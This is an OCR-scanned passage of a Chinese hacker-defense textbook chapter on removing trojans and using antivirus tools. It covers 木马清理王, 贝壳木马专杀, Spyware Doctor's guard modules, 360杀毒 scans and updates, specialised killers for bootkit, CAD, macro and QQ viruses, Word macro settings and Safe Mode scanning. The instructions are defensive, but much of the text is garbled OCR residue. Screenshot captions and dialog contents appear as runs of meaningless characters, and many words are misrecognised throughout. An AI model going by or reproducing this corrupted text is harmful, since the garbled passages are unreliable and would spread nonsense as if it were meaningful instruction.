理 王 查 杀 木马 工作 界面 ， 如 下 图 所 示 。 
[-=*] 


感 削 直 4 训 持 :你 民用 的 是 用 姑 本! 


市 马 清 理 王 

mm 呈 国 二 .2. 
Ed 境内 存 
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甸 团 之 3:\ 

RR marms Bes\ 

国 简陋 高 区 域 

和 坟 困 


EE 


[Eee 图 单 击 “开始 查 杀 病毒 ”按钮 ， 即 可 开 
始 扫描 并 清理 系统 中 的 木马 病毒 程序 ， 如 
下 图 所 示 。 
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[step 图 扫描 并 清理 木马 程序 完成 后 ， 即 可 弹 
出 “报告 ”对 话 框 ， 在 其 中 显示 了 清理 木 
马 程 序 的 数量 ， 如 下 图 所 示 。 
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[Step 图 单 去 《木马 清理 王 》 工 作 界 面 中 的 “ 程 
序 隔 离 区 域 ” 按 钮 ， 即 可 弹出 “程序 隔离 
区 域 ” 对 话 框 , 在 其 中 显示 了 隔离 后 的 文件 ， 
如 下 图 所 示 。 


图 得 卫 有 二 LL-.2 x. 
件 TB 关 

DE ce: windes\sys te \drirers\abhoop sys 2019-09-20 

[LL 钱 | LL 哎 几 球 咱 直 


绝招 6: 使 用 《贝克 木马 专 杀 》 清 除 木 马 器 


《贝壳 木马 专 杀 》 是 国内 首 款 专 为 网 游 音 
防盗 号 量 身 打造 的 ， 完 全 免费 的 木马 专 杀 
软件 ， 其 安全 检测 采用 云 计算 技术 ， 拥 有 
世界 最 大 的 云 安 全 数据 库 ， 能 在 5 分 钟 内 
快速 识别 新 木马 /病毒 ， 保 证 系统 、 账 号 、 
用 户 隐 私 安全 。 

使 用 《金山 贝壳 木马 专 杀 》 清 除 木马 
的 具体 操作 步骤 如 下 。 

[sep 回 下 载 并 安装 《贝壳 木马 专 杀 1.5》 软 件 ， 
双击 其 快捷 图 标 ， 打 开 《 贝 克 木 马 专 杀 1.5》 
主 窗 口 ， 如 下 图 所 示 。 
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step 图 选中 快速 扫描 ” 单 选 按钮 后 , 单 击 “ 开 
始 查 杀 ” 按 钮 ， 即 可 开始 查 杀 病 毒 。 在 “ 云 
安全 检测 ”选项 卡 中 ， 即 可 看 到 信任 文件 、 
无 威胁 文件 、 未 知 文件 、 木 马 / 病毒 等 类 型 
文件 的 个 数 ， 如 下 图 所 示 。 


[DD 7:2 -ms-mae- 


Gm 0 ici | 


EEE Nad: ERE CHEIND: ST A/ 
NM ET TL 
MS 
FR RE 


Mrs FU 


[Eee 图 在 扫描 的 过 程 中 ， 如 果 发 现存 在 有 木 

马 病 毒 文件 ， 将 会 弹出 “发 现 木 马 ” 对 话 

框 ， 在 其 中 显示 木马 的 名 称 、 路 径 等 信息 。 

用 户 可 根据 实际 需要 选择 “清除 ”或 “ 跳 

过 ”， 这 里 单 击 “ 清 除 ” 按 钮 ， 即 可 清除 该 

木马 文件 ， 如 下 图 所 示 。 
出 此 W 相 马 


@ sa+3 


名 车: trojnpow pawwow,41285 


口 总 是 所 行 相同 换 作 


CC™ 


[Sep 加 如 果 想 查看 木马 的 详细 信息 ， 则 可 在 
“发 现 木 马 ” 对 话 框 中 单 击 “ 去 病毒 百科 
查看 详情 ” 超 链 接 ， 打 开 “ 贝 克 安 全 文件 
百科 ”窗口 ， 在 其 中 即 可 看 到 该 病毒 文件 
的 详细 信息 ， 如 下 图 所 示 。 
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册 相 工具 有 一 个 可 机 的 界 ， 塌 对 所 户 的 电 浊 行 记 旦 机 森马 和 六 了 灾 工 具 入 主星 革 td 的 本 


订 台 曾 寺 人 和 用 户 的 电机， 再 有 过 工具 克 刘 过 汉 趟 世 和 二 划 和 近 捉 ， 其 当地 各- 
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[se 图 待 扫 描 完成 后 ， 打 开 “ 扫 描 报告 ”对 
话 框 ， 在 其 中 可 查看 发 现 的 木马 病毒 数 、 
扫描 所 用 的 时 间 以 及 扫描 的 文件 数 等 信息 ， 
如 下 图 所 示 。 
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未 知 文件 : 
扫描 时 间 : 2 分 19 秒 
扫 撕 文件 : 8373 个 
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友情 提示 : 人 ， 由 贝壳 云 安全 进行 快速 分 
单 去 “关闭 ”按钮 返回 “贝壳 木马 专 
杀 1.5” 主 界面 , 选择 “木马 /病毒 ”选项 卡 ， 


在 其 中 即 可 看 到 已 经 清除 的 木马 病毒 文件 
列表 ， 如 下 图 所 示 。 
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绝招 7: 使 用 Spyware Doctor 清 除 木 马 


Spyware Doctor 是 一 款 非 常 先进 的 间谍 
软件 、 木 马 程序 清除 工具 ， 可 以 检查 并 从 
计算 机 中 移 除 间谍 软件 、 广 告 软件 、 木 马 
程序 、 键 盘 记 录 器 和 追踪 威胁 等 。 

使 用 Spyware Doctor 清除 木马 程序 的 
具体 操作 步骤 如 下 。 

[step 图 下 载 并 安装 Spyware Doctor， 双 击 桌 
面 上 的 Spyware Doctor 图 标 ， 打 开 Spyware 
Doctor 窗口 ， 如 下 图 所 示 。 
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pctsols 
step 园 在 IntelliGuard 选项 卡 中 单 击 “ 单 
击 激 活 IntelliGuard” 和 链接 即 可 激活 
IntelliGuard， 如 下 图 所 示 。 


(po re Tools 
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lstep 图 在 Spyware Doctor 窗 口中 单 击 
Browser Guard 选 项， 打 开 Browser Guard 
窗口 ， 在 其 中 设置 Browser Guard 参数 ， 从 
而 保护 浏览 器 设置 不 被 恶意 变更 ， 以 防止 
浏览 器 被 恶意 添加 插件 ， 如 下 图 所 示 。 


ntellicuard 保护 


[2 


me | 
EE 7 


pctiols me 。 | 


[Sep 四 单 去 File Guard 选项 ， 打 开 File Guard 
窗口 ， 在 其 中 设置 File Guard 参数 ， 从 而 监 
控 系 统 中 的 所 有 文件 ， 以 防止 被 入 侵 ， 如 
下 图 所 示 。 
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[ep 图 单 击 Netword Guard 选项 ， 打 开 Netword 
Guard 窗口 ， 在 其 中 设置 Netword Guard 
参数 ， 以 阻止 对 网 络 设置 的 恶意 更 改 ， 使 
得 威胁 软件 停止 拦截 网 络 连 接 ， 如 下 图 
所 示 。 


re 


思 Spyware Doctor ( 带 防毒 组 件 包 ) 


Intellicuard 保护 


[step 图 单 击 Process Guard 选 项 ， 打 开 Process 
Guard 窗 口 ， 在 其 中 设置 Process Guard 参 
数 ， 以 检测 并 阻止 隐藏 的 恶意 进程 ， 如 下 
图 所 示 。 


Estee 加 单 击 Startup Guard 选项 ， 打 开 Startup 
Guard 窗口 , 在 其 中 设置 Startup Guard 参数 ， 
以 检测 并 阻止 恶意 应 用 软件 在 系统 中 的 配 
置 并 自动 启动 ， 如 下 图 所 示 。 


单 击 Immunizer Guard 选 项 ， 打 
开 Immunizer Guard 窗 口 ， 在 其 中 设置 
Immunizer Guard 参 数 ， 以 防御 谈 入 计算 机 
中 最 新 ActiveX 型 威胁 ， 如 下 图 所 示 。 
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[step 图 单 去 Cookie Guard 选项 ， 打 开 Cookie 
Guard 窗口 , 在 其 中 设置 Cookie Guard 参数 ， 
以 监视 浏览 器 是 否 存在 恶意 跟踪 或 广告 
如 下 图 所 示 。 
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e Doctor ( 带 防毒 组 件 包 ) 
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单 击 Site Guard 选项 ， 打 开 Site Guard 
窗口 ， 在 其 中 设置 Site Guard 参数 ， 以 监视 
并 拦截 潜在 恶意 站 点 的 访问 ， 下 同人 


二 Spyvare Doctor (党 防 者 组 件 包 ) 


Tatelliguard 保护 


[se 图 单 去 Keylogger Guard 选 项 , 打开 
Keylogger Guard 窗 口 , 在 其 中 设置 Keylogger 
Guard 参 数 , 以 监视 并 阻止 所 有 能 够 记录 按 
键 和 个 人 信息 的 Keylogger 恶 意 程 序 , 如 下 图 
所 示 。 


[sp 图 单 击 Email Guard 选项 ， 打 开 Email 
Guard 窗口 , 在 其 中 设置 Email Guard 参数 ， 
以 对 收发 的 所 有 电子 邮件 中 的 附件 进行 扫 
描 和 查 杀 ， 如 下 图 所 示 。 


[Sep 图 单 击 Behavior Guard 选项 ， 打 开 Behavior 
Guard 窗口 ， 在 其 中 设置 Behavior Guard 参 
数 ， 以 检测 出 计算 机 中 的 病毒 、 间 谍 软 件 、 
蠕虫 、 木 马 程序 和 其 他 恶意 软件 攻击 ， 如 
下 图 所 示 。 
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8.3 ”使 用 《360 杀 毒 》 软件 查 杀 
病毒 


当 自 己 的 计算 机 出 现 了 中 毒 的 特征 后 ， 
就 需要 对 其 查 杀 病毒 。 目 前 流行 的 杀毒 软 


Fe 件 很 多 ，《360 杀毒 》 是 当前 使 用 比较 广泛 
ca 的 杀毒 软件 之 一 ， 该 软件 引用 双 引 擎 的 机 


— 制 ， 拥 有 完善 的 病毒 防护 体系 ， 不 但 查 杀 
[ep 加 单 去 “启动 扫描 ”选项 卡 ， 在 其 中 选 能力 出 色 ， 而 且 对 于 新 产生 病毒 木马 能 够 
择 扫描 范围 ， 如 下 图 所 示 。 第 一 时 间 进 行 防御 。 


绝招 8: 安装 《360 杀 毒 》 软 件 
《360 杀毒 》 软 件 下 载 完 成 后 ， 即 可 进 外 
行 安装 杀毒 软件 ， 具 体 的 操作 步骤 如 下 。 


双击 下 载 的 《360 杀毒 ) 软 件 安装 程序 ， 
即 可 打开 如 下 图 所 示 的 安装 界面 。 


[Eee 国 单 二 “立即 扫描 ”按钮 ， 即 可 开始 对 
选 定 的 扫描 范围 进行 扫描 ， 如 下 图 所 示 。 


Spyware Doctor ( 带 防毒 组 件 包 ) 


rn 包 
入 当知 雹 [Gee 国 单 去 “立即 安装 ”按钮 ， 即 可 开始 安 
| = = 装 《360 杀毒 ) 软件 ， 并 显示 安装 的 进度 ， 
如 下 图 所 示 。 
人 360 杀 盏 500 


式 版 5007121 


[ep 图 在 等 待 扫描 完毕 之 后 ， 就 会 弹出 “ 扫 
描 摘 要 ”对 话 框 ， 如 下 图 所 示 。 单 击 “完成 ” 
按钮 ， 即 可 完成 计算 机 的 扫描 。 ls 


step 图 安装 完毕 后 ， 弹 出 360 新 版 特性 提示 
对 话 框 ， 如 下 图 所 示 。 
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EEep 国 单 去 “立即 体验 ”按钮 ， 即 可 打开 
《360 杀毒 》 主 界面 ， 从 而 完成 360 杀毒 的 
安装 ， 如 下 图 所 示 。 


病毒 库 其 实 就 是 一 个 数据 库 ， 里 面 记 
录 着 计算 机 病毒 的 种 种 特征 ， 以 便 及 时 发 
现 病毒 并 绞 杀 它们 。 只 有 拥有 了 病毒 库 
杀毒 软件 才能 区 分 病毒 和 普通 程序 之 间 的 
区 别 。 不 过 ， 要 想 让 计算 机 能 够 对 新 病毒 
有 所 防御 ， 就 必须 要 保证 本 地 杀毒 软件 的 
病毒 库 一 直 处 于 最 新 版 本 。 下 面 以 《360 杀 
毒 》 的 病毒 库 升级 为 例 进行 介绍 ， 具 体 的 
操作 步骤 如 下 。 

EG 国 单 击 (360 杀毒 ) 主 界面 的 “检查 更 新 ” 
链接 ， 如 下 图 所 示 。 


[step 图 弹出 “360 杀毒 - 升级 ”对 话 框 ， 提 
示 用 户 正 在 升级 ， 并 显示 升级 的 进度 ， 如 
下 图 所 示 。 


第 8 章 ”木马 病毒 的 防御 与 杀毒 软件 的 使 用 


【s) 正在 升级 ， 请 稿 候 .… 


正在 各 摊 要 新 信息 
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便 用 对 间 : 00:00:00 


[Ses 国 升级 完成 后 ， 弹 出 “360 杀毒 -升级 ” 
对 话 框 ， 提 示 用 户 升级 成 功 完成 ， 并 显示 
程序 的 版 本 等 信息 ， 如 下 图 所 示 。 

【&) 升级 成 功 完成 ， 您 的 病毒 库 和 程序 已 是 最 新 ! 
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[Eee 加 单 去 病毒 库 日 期 右 侧 的 “立即 开启 ” 
按钮 ， 开 始 升级 病毒 库 信息 ， 如 下 图 所 示 。 


@ ma wee. 
正在 下 载 升 级 所 等 的 配置 文件 使 用 时 间 : 00:00:04 
人 

[sr | 


[sep 图 升级 完成 后 ， 提 示 用 户 常规 引擎 已 成 
功 安装 ， 如 下 图 所 示 。 


常规 引擎 已 成 功 安装 ， 并 棕 参 与 以 后 的 要 棋 。 建 议 您 立即 执 
行 一 次 旺 兰 ! 

5.0.0.8150 

2018-11-16 14:29 

1,511,431 


4212210 
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黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


Eee 国 单 去 “查看 升级 日 志 ” 超 链接 ， 即 可 
打开 “360 杀毒 - 日 志 ” 对 话 框 ， 在 其 中 显 
示 产 品 升 级 的 记录 ， 如 下 图 所 示 。 


Be 
5 手 届 有 级。 viratjnC 作 | 放 从 站 克 磋 日 六 2015-11-16 1429 
i 


i 
国 防护 日 志 
悚 文 阵 上传 
2 


Sn 0FLLL NE 


绝招 10: 快速 查 杀 计算 机 中 的 病毒 


l 一 旦 发 现 计算 机 运行 不 正常 ， 用 户 首 
先 分 析 原 因 ， 然 后 即 可 利用 杀毒 软件 进行 
杀毒 操作 。 下 面 以 《360 杀毒 》 查 杀 病 毒 为 
例 讲解 如 何 利用 杀毒 软件 杀毒 。 

使 用 《360 杀毒 》 软 件 杀毒 的 具体 操作 
步骤 如 下 。 
[se 加 启动 《360 杀毒 》，《360 杀毒 》 为 用 
户 提供 了 3 种 查 杀 病 毒 的 方式 , 即 快速 扫描 、 
全 盘 打 描 和 自 定 义 扫 描 ， 如 下 图 所 示 。 


Ek Sonn A 21116 ea 


step 回 这 里 选择 快速 扫描 方式 ， 单 击 “ 快 
速 扫描 ”按钮 ， 即 可 开始 扫描 系统 中 病毒 
文件 ， 如 下 图 所 示 。 
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METH : IE6ASDA1-5731-4658-8036-89E16EF25CAG 


[step 图 在 扫描 的 过 程 中 , 如 果 发 现 木 马 滴 毒 ， 
则 会 在 下 面 的 空格 中 显示 扫描 出 来 的 木马 
病毒 ， 并 列 出 其 危险 程度 和 相关 描述 信息 ， 
如 下 图 所 示 。 


将 we 


6 国 单 去 “立即 处 理 ”按钮 ， 即 可 删除 扫 
描 出 来 的 木马 病毒 或 安全 威胁 对 象 ， 如 下 
图 所 示 。 

[ae 
ee Er ga 


[step 图 羊 去 “确定 ”按钮 ， 返回 到 “360 了 冰毒” 
窗口 ， 在 其 中 显示 被 《360 杀毒 》 处 理 的 项 
目 数量 ， 如 下 图 所 示 。 


1 


【 oieairtammen se: =e== 
mam ews6 


第 8 章 ”木马 病毒 的 防御 与 杀毒 软件 的 使 用 


step 图 单 击 “确定 ”按钮 ， 即 可 开始 清除 恢 
复 区 所 有 的 项 目 ， 并 显示 清除 的 进度 ， 如 
下 图 所 示 。 


单 击 “隔离 区 ” 超 链 接 ， 打 开 “360 
恢复 区 ”对 话 框 ， 在 其 中 显示 被 《360 杀毒 》 
处 理 的 项 目 ， 如 下 图 所 示 。 


pr i 
sm he 
ramet 加 
no。 地 

a i 


nei ate 
天 


[step 园 选中 “全 选 ” 复 选 框 ， 选 中 所 有 恢复 
区 的 项 目 ， 如 下 图 所 示 。 
CE 


Te 
RE AN 2 ME 


[step[ 单 去 “清空 恢复 区 ”按钮 ， 弹 出 一 个 
信息 提示 对 话 框 ， 提 示 用 户 是 否 确定 要 一 
键 清空 恢复 区 的 所 有 隔离 项 ， 如 下 图 所 示 。 


您 确定 一 键 清空 恢复 区 的 所 有 隔离 项 吗 ? 


清空 后 所 有 阿 记 项 棕 不 能 被 估 复 


step 图 清除 恢复 区 所 有 项 目 完毕 后 ， 将 返回 
“360 恢复 区 ”对 话 框 ， 如 下 图 所 示 。 
[cm -x| 


另外 ， 使 用 《360 杀毒 》 软 件 还 可 以 对 
系统 进行 全 盘 杀 毒 。 只 需 在 “病毒 查 杀 ” 
选项 卡 下 单 击 “ 全 盘 扫描 ”按钮 即 可 ， 全 
盘 扫描 和 快速 扫描 类 似 ， 这 里 不 再 详 述 。 


绝招 11: 自 定义 查 杀 计算 机 病毒 a 
下 面 再 来 介绍 一 下 如 何 对 指定 位 置 进 网 
行 病 毒 的 查 杀 ， 具 体 的 操作 步骤 如 下 。 


[Eee 国 在 《360 杀毒 》 工 作 界面 中 单 击 “ 自 
定义 扫描 ”图 标 ， 如 下 图 所 示 。 
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SS” 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


[step 较 打开 “选择 扫描 目录 ”对 话 框 ， 在 需 
要 扫描 的 目录 或 文件 前 选中 相应 的 复 选 框 ， 
这 里 选中 Windows 10 (C:) 复 选 框 ， 如 下 
图 所 示 。 


请 多 先 上 您 要 提交 的 目录 或 文件 


由 口 本 地 辜 盟 (F 
由 ' 口 窜 CD 驱动 艺 (G:) Mobile Partner 
由 ' 口 二 本 地 亚 盘 (H:) 


单 击 “扫描 ”按钮 ， 即 可 开始 对 指定 
目录 进行 扫描 ， 如 下 图 所 示 。 


step 园 其 余 步 又 和 “快速 查 杀 ”相似 ， 这 里 
不 再 详细 介绍 。 


(人 @ 提 示 : 大 部 分 杀毒 软件 查 杀 病毒 的 方法 
比较 相似 ， 用 户 可 以 利用 自己 的 杀毒 软件 
进行 类 似 的 病毒 查 杀 操作 。 


8.4 使 用 病毒 专 杀 工 具 查 杀 
病毒 


在 使 用 杀毒 软件 查 杀 病毒 的 过 程 中 ， 
一 些 比较 顽固 的 病毒 是 扫描 不 出 来 的 ， 这 
时 就 需要 使 用 一 些 专门 的 病毒 查 杀 工具 来 
查 杀 计 算 机 病毒 了 。 
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绝招 12: 查 杀 异 鬼 病毒 


异 鬼 病毒 是 腾讯 电脑 管家 捕获 的 一 恶名 
性 Bootkit 病毒 ， 该 病毒 可 算 改 浏览 器 主页 、 
劫持 导航 网 站 ， 并 在 后 台 刷 取 流 量 。 不 过 ， 
电脑 管家 已 全 面 防御 “ 异 鬼 工 ”病毒 ， 使 
用 电脑 管家 查 杀 “ 异 鬼 工 ”病毒 的 具体 操 
作 步 骤 如 下 。 
[step 图 在 电脑 管家 中 下 载 “ 异 鬼 开 病毒 免疫 
工具 ? ， 双 击 运行 工具 ， 即 可 开始 扫描 “ 异 
鬼 开 ”病毒 ， 如 下 图 所 示 。 


旧 电脑 管家 - 异 包工 病 专 专 杀 工 县 


step 图 如 果 扫描 过 程 中 没有 发 现 “ 异 鬼 下” 
病毒 ， 将 给 出 计算 机 安全 的 信息 提示 ， 如 
下 图 所 示 


VY 未 发 现 异 鬼 工 ” 病毒 ， 电脑 安全 ! 


司 玫 感 染 “ 异 史 世 ” 病 素 ,电脑 管家 已 提供 全 面 防 币 


了 解 电脑 管家 


[step 图 如 果 发 现 “ 异 鬼 下 ”病毒 ， 将 给 出 计 
算 机 中 存在 异 鬼 病毒 的 信息 提示 ， 需 要 用 
户 立 即 进行 查 杀 ， 如 下 图 所 示 。 


名 电脑 管家 - 呈 天 了 I 病 吉 专 半 T 匡 


[Bn 国 单 南 “ 立 即 查 杀 ” 按 钮 ， 即 可 开始 查 
杀 “ 异 外 下 ”病毒 ， 如 下 图 所 示 。 


全 电 且 管 素 - 办 由 本 所 帮 专 杀 工 具 
W7 正在 查 杀 “ 异 鬼 世 ” 病毒 


) 正在 查 杀 “ 异 兄 工 ” 府 机 ， 请 梢 个. 


取消 


[ep 图 查 杀 完成 后 ， 将 给 出 “ 异 鬼 下” 病毒 
已 成 功 清除 的 信息 提示 ， 如 下 图 所 示 。 


2 CAD 病毒 是 利用 Lisp 语言 编写 ， 在 
CAD 启动 时 自动 加 载 ， 并 自动 生成 扩展 名 
为 sp、fans 的 程序 文件 ， 该 病毒 到 处 传播 ， 
致使 许多 杀毒 软件 也 无 能 为 力 ， 甚 至 重 装 
CAD 也 不 能 解决 问题 。《360 CAD 专 杀 》 
工具 是 一 款 针 对 CAD 病毒 设计 的 查 杀 软 件 ， 


第 8 章 ”木马 病毒 的 防御 与 杀毒 软件 的 使 用 


专门 查 杀 CAD 病毒 ， 让 用 户 的 计算 机 得 到 
最 佳 保 护 。 

[step 图 双击 下 载 的 “360CAD 病毒 专 杀 工 具 ” 
软件 ， 打 开 “360CAD 病毒 专 杀 工具 ”工作 
界面 ， 如 下 图 所 示 。 


60EAD 抽 = 


人 吕 证 


旬 方式 : 口 职 名 为 bakgX 首 图 训 入 加 和 。 癌 强力 模式 。。 去 0i 二 所 锣 下载 %0 龟 条 


[Be 图 单 击 “ 需 扫描 的 分 区 ” 右 侧 的 “所 有 
分 区 ”按钮 ， 在 弹出 的 下 拉 列 表 中 选择 需 
要 扫描 的 分 区 ， 如 下 图 所 示 。 


B60[EA 世 病 玛 志 示 弄 恒 | 


地 方式 : 口 凑 名 为 bakX 御 图 所 入 加 的 亲口 强力 异 式 ”去 360i6 二 到 锯 下载 W0 龟 从 箱 


单 击 “ 开 始 扫描 ”按钮 ， 即 可 开始 打 
描 分 区 中 存在 的 CAD 病毒 ， 对 于 扫描 出 来 
的 CAD 病毒 , 将 直接 进行 查 杀 , 如 下 图 所 示 。 


EULEAP 病 去 专 示 是 | Ch 


已 提包 文件 1952 MRR 0 人 痛 止 扫 手 
在 前 妈 。 G66 寺 全 开关 下 载 床 村 尼 四 划 戎 允 几 
RB 文人 由 入 处 至 结 果 


处 方式 : 口 座 名 为 bz 广 宦 国 亲 入 回 kk 于 强力 模式 。。 去 30iS 二 到 镶 下载 0 钨 术 巷 
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SS 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


step 园 扫描 完成 后 ， 如 果 没有 发 现 CAD 病 
毒 ， 将 弹出 一 个 “消息 ”对 话 框 ， 提 示 用 
户 扫描 结束 ,未 发 现 风险 信息 ,如 下 图 所 示 。 


x 


@ ss .+amme. 


[| 


日 绝招 14: 查 杀 Office 宏 病毒 
联 ”使 用 《360 杀毒 》 还 可 以 对 Office 宏 病 
毒 进行 查 杀 ， 具 体 的 操作 步骤 如 下 。 


[step 国 在 《360 杀毒 》 的 主 界面 中 单 击 “ 宏 
病毒 扫描 ”图 标 ， 如 下 图 所 示 。 


0001x 


[step 较 弹出 “360 杀毒 ”对 话 框 ， 提 示 用 户 
扫描 前 需要 关闭 已 经 打开 的 Office 文档 ， 
如 下 图 所 示 。 


着 扫 措 前 请 保存 并 关闭 已 打开 的 Office 文 档 


[step 图 单 直 “确定 ”按钮 ， 即 可 开始 扫描 计 
算 机 中 的 宏 病 毒 ， 并 显示 扫描 的 进度 ， 如 
下 图 所 示 。 
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E55 国 扫描 完成 后 ， 即 可 对 扫描 出 来 的 宏 病 
毒 进行 处 理 ， 这 与 “快速 查 杀 ” 相 似 ， 这 
里 不 再 详细 介绍 。 


绝招 15: 查 杀 QQ 木马 病毒 


使 用 QQ 病毒 专 杀 工 具 可 以 快速 清除 
计算 机 中 的 QQ 病毒 、 木 马 、 流 氓 软件 等 ， 
具体 的 操作 步骤 如 下 。 
双击 QQ 病毒 专 杀 工具 , 即 可 打开 “QQ 
病毒 专 杀 工 具 ” 主 界面 ， 如 下 图 所 示 。 


党 Ts NR zol2 11 
应 中 时 回 物 同 给 出 ns a men 
El 全 几 邮 有 有理 未 网 个 只 nsr3 字 册 


HR UE Rn 


中 
和 本 全 工 全 :0 失 。 
特大 六 网 少 中 六 二 


ait 


EE 
] 于 认识 加 EE 
= | 


[step 国 单 击 “ 手 动 查 每” 按钮， 即 可 开始 查 
杀 病 毒 ， 并 在 “ 查 杀 病 毒 ”工作 窗口 中 显 
示 扫 描 出 来 的 结果 ， 如 下 图 所 示 。 


朱 外 时 地 物 且 bk 4 


eA: 


二条 本 2012 1 1 
EL 


39900 Cedarshinini 


step 国 在 扫描 过 程 中 ， 如 果 发 现 可 疑 病毒 ， 
会 弹出 一 个 信息 提示 框 ， 单 击 “ 确 定 ” 按钮 ， 
即 可 将 扫描 出 来 的 可 疑 病毒 查 杀 ， 如 下 图 
所 示 。 


QQ 病毒 木马 专 欠 工具 一 QQKav 


启动 项 中 发 现 姓 是 病毒 加 载 项 : 


ctfmon, o: \windows\system32\ctfmon. exe 


二 由 填 区 二 人 bw 
记 莹 了 ] La | 


Emma 国 扫描 完成 后 ， 在 “ 查 杀 病毒 ” 窗 格 中 
选择 需要 粉碎 的 文件 ， 右 击 ， 在 弹出 的 忆 
捷 菜 单 中 选择 “粉碎 ”菜单 命令 ， 如 下 图 
所 示 。 


rr 


PL) 安 (5) TaID {ES(N) 


言 可 时 症 和 国友 i 眉 KK 


5 
Pt OE Te 


EE i MR eh A Re FE 1s lt 
| 六 # 和 六 二 | 裕一 大 小 修了 | 
站 ,an 应 用 程 序 。 存在 风险 6IB 05-06-30. | 
In 文件 存 主 办 | 
fts 


| 司 Hai) 


局 mxzFagtRon 

| | 区 aa - = 
1 sms | | 和 Ef 
| a EFA | [开罗 


| UB ehoducorisr Em) 
| SEF 
CC ——— De 


[step 图 弹出 一 个 信息 提示 框 ， 提 示 用 户 是 否 
要 彻底 粉碎 病毒 体 文件 ， 如 下 图 所 示 。 


本 提 示 ; x 


【i 彻 谢 粉 碎 这 个 病毒 体 文 件 号? 


| | 


[es 园 单 二 “确定 ”按钮 ， 即 可 将 选中 的 病 
毒 体 文件 粉碎 ， 如 下 图 所 示 。 
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oa 二 本 4 了 到 


庆 需 而 Ss 顶 局 于 昌 不 缮 B 复 msTs 拓 
[及 天 基本 “大 小 。 候 沙 类 | 全 


人 亲本 Er 证 为 
忆 Shrw 本 页 DA 
Cs EE 
口 其 E: 门 捉 制 记者 下 生 。 门 水 底 抽 从 闹 吉 


[ee 图 选择 “安全 ”菜单 命令 ， 在 弹出 的 快 
捷 菜 单 中 选择 相关 选项 ， 可 以 屏蔽 恶意 网 
站 、QQ 尾巴 消息 、 好 友 发 送 病 毒 等 ， 如 下 
图 所 示 。 


xD) IED ES WO) 
TT = a 
锯 EE RN 下 HE。 天 
给 WKE 大 小 做 则 | 中 性 1 
TEESUN 0B 05-06-30 CWhr ve Fle 
mo CMare Mile 
| WER en Cindenssys 
l PE 050 :Windenshsye? 
eee ER om rpm nindors\syet 
和 
EU Fo] [EXD | 
cer 页 
Cues 和 吉 (| | 开机 六 者 (8) | 
De: ew Tve 国 [和 


Step 加 单 去 “闪电 杀毒 ”按钮 ， 即 可 快速 查 
杀 系 统 中 的 病毒 文件 ， 如 下 图 所 示 。 


0 六 直率 工商 


wl) 15) TED GSN) WOE) 


和 入 pr pur 
言 相 曙 前 加 届 纹 这 记 。 于 
实 全 类 读 : 可 下 请 要 。 进 笠 管 理 。 户 中 叶山 必 项 。 网 蚊 玫 浊 。 系 缮 用 香 ”Ws1s 。 求助 
| 立 插 粉 砍 模 忆 加 芷 关内 
a 
Hf: 


疯 外 林 后 -首页 为: 


:JE 专 亿 | | 注入 本 亲 介 | 
cor 页 
Ca Es) 
De [Jer 后 9 考生 革 度 机 


step 图 单 击 “ 注 入 查 杀 ”按钮 ， 即 可 进行 注 
入 查 杀 ， 如 下 图 所 示 。 
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克昌 实战 演练 


黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


和 
训 息 曙 芝 唤 司 生生 赂 于 刘 


En 


0 请 过于 可 专 未 了 员 


Fs 


则 处 专员 于 太 : Fs | [Em 
eur 
i EINED 
Po: 7 


step 柄 单 击 “ 开 机 杀毒 ”按钮 ， 即 可 启动 开 
机 条 才 功 能 ， 如 下 图 所 示 。 


如 山 安 汪 6 工具 中 任 男 (N) 着 


CE EE 0 宦 区 区 mo 克 下 


EE EE CE 
sen 
ui 
Er ET ETT 
而 本 后 者 下 定 访 : Fu] [EA 
Sarl 
Dye EE 
DM Fe Jriee we 国 7 和 


8.5 ”实战 演练 


一 一 在 Word 中 预防 宏 病 毒 
包含 宏 的 工作 短 更 容易 感染 病毒 ， 


“所 以 用 户 需要 提高 宏 的 安全 性 ， 下 面 以 在 


Word 2016 中 预防 宏 病毒 为 例 ， 介 绍 预防 宏 
病毒 的 方法 ， 具 体 的 操作 步骤 如 下 。 
Eee 国 打开 包 合 宏 的 工作 簿 ， 选 择 “ 文 
件 ” 一 “选项 ”选项 ， 如 下 图 所 示 。 


-Wd BR ? - O Xx 
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step 图 打开 “Word 选项 ”对 话 框 ， 选 择 “ 信 
任 中 心 ” 选 项 ， 然 后 单 击 “信任 中 心 设 置 ” 
按钮 ， 如 下 图 所 示 。 

转 帮助 保持 又 档 和 计算 机 的 安全 以 及 计算 机 的 状况 良好 , 


安全 和 其 他 信息 


-om 以 了 由 训 兰 侣 护 从 的 入 私 和 坪 全 的 六 名 信 息 - 


确定 取消 


[step 图 弹出 “信任 中 心 ”对 话 框 ， 在 左 侧 列 
表 中 选择 “ 宏 设置 ”选项 ， 然 后 在 “ 宏 设置 ” 
列表 中 选中 “禁用 无 数字 签署 的 所 有 宏 ” 
单 选 按钮 ， 单 击 “确定 ”按钮 ， 如 下 图 所 示 。 


J 能 会 运行 有 洪 在 危险 的 代码 )(E) 
开发 人 员 守 设置 


口 全 {59 VBA 工程 对 龟 模 型 的 访问 (V) 


实战 演练 2 一 一 在 安全 模式 下 查 杀 病 毒 


安全 模式 的 工作 原理 是 在 不 加 载 第 三 器 
方 设备 驱动 程序 的 情况 下 启动 计算 机 ， 使 
计算 机 运行 在 系统 最 小 模式 ， 这 样 用 户 就 
可 以 方便 地 查 杀 病 毒 ， 还 可 以 检测 与 修复 
计算 机 系统 的 错误 。 下 面 以 Windows 10 操 
作 系 统 为 例 介 绍 在 安全 模式 下 查 杀 病毒 的 
方法 ， 有 具体 的 操作 步骤 如 下 。 

[step 图 按 Windows+R 组 合 键 ， 打 开 “ 运 行 ” 
对 话 框 ， 在 “打开 ”文本 框 中 输入 msconfig， 
如 下 图 所 示 。 


文件 夹 、 文 档 或 Internet 资源 


Step 图 弹出 “系统 配置 ”对 话 框 , 选择 “引导 ” 
选项 卡 , 在 “引导 ”选项 卡 中 选中 “安全 引导 ” 
复 选 框 和 “最 小 ” 单 选 按钮 ， 如 下 图 所 示 。 


EE 


RR NB Bm Ia 


CJ | 


step 较 单 击 “确定 ”按钮 ， 即 可 进入 系统 的 
安全 模式 ， 如 下 图 所 示 。 


step 辆 进入 安全 模式 后 , 即 可 运行 杀毒 软件 ， 


进行 病毒 的 查 杀 ， 如 下 图 所 示 。 


